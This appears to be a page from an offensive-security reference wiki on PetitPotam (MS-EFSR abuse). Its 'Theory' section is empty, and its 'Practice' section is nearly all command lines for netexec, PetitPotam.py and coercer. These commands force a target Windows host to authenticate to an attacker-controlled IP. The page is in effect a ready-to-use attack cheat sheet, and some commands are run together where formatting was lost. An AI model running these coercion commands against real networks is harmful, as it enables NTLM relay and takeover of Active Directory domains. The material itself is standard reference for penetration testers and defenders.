MS-EFSR abuse (PetitPotam)
Theory
Practice
netexec smb <TARGET> -u <USER> -p <PASSWORD> -M petitpotam -o PIPE=netlogonPetitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP# With $TARGET as [[domain/]username[:password]@]<targetName or address>
petitpotam.py -method AddUsersToFile -pipe lsarpc $TARGET '\\$ATTACKER_IP\share\foo'# Coerce
coercer coerce -u $USER -p $PASSWORD -d $DOMAIN --filter-protocol-name MS-EFSR -l $ATTACKER_IP -t $TARGET_IP
# Coerce a specific method
coercer coerce -u $USER -p $PASSWORD -d $DOMAIN --filter-method-name EfsRpcFileKeyInfo -l $ATTACKER_IP -t $TARGET_IPPetitpotam.py $ATTACKER_IP $TARGET_IPResources
Last updated
